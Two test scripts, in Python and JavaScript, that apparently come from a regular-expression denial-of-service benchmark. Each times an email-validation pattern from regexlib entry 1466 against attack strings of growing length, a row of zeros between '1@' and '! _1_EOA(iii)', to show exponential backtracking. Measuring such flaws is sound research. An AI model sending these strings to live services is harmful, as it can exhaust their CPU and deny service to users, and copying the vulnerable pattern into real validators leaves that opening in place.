File: regexlib/2021-5-15/python_re_test_file/regexlib_1466.py
# 1466
# ^((?:(?:(?:\w[\.\-\+]?)*)\w)+)\@((?:(?:(?:\w[\.\-\+]?){0,62})\w)+)\.(\w{2,6})$
# EXPONENT
# nums:4
# EXPONENT AttackString:"1@"+"0"*32+"! _1_EOA(iii)"

import re
from time import perf_counter

regex = """^((?:(?:(?:\w[\.\-\+]?)*)\w)+)\@((?:(?:(?:\w[\.\-\+]?){0,62})\w)+)\.(\w{2,6})$"""
REGEX = re.compile(regex)
for i in range(0, 150000):
    ATTACK = "1@" + "0" * i * 1 + "! _1_EOA(iii)"
    LEN = len(ATTACK)
    BEGIN = perf_counter()
    m = REGEX.search(ATTACK)
    # m = REGEX.match(ATTACK)
    DURATION = perf_counter() - BEGIN
    print(f"{i *1}: took {DURATION} seconds!")

File: regexlib/javascript_test_file/regexlib_1466.js
/* 1466
 * ^((?:(?:(?:\w[\.\-\+]?)*)\w)+)\@((?:(?:(?:\w[\.\-\+]?){0,62})\w)+)\.(\w{2,6})$
 * EXPONENT
 * nums:3
 * EXPONENT AttackString:"1@"+"0"*32+"! _1_EOA(iii)"
 */
var REGEX = /^((?:(?:(?:\w[\.\-\+]?)*)\w)+)\@((?:(?:(?:\w[\.\-\+]?){0,62})\w)+)\.(\w{2,6})$/
for(var i = 1; i <= 5000000; i++) {
    var time = Date.now();
    var attack_str = '1@' + '0'.repeat(i*1) + '! _1_EOA(iii)'
    REGEX.exec(attack_str)
    // REGEX.test(attack_str);
    // attack_str.search(REGEX)
    // attack_str.match(REGEX)
    var time_cost = Date.now() - time;
    console.log(i * 1 + ": " + time_cost+" ms")
}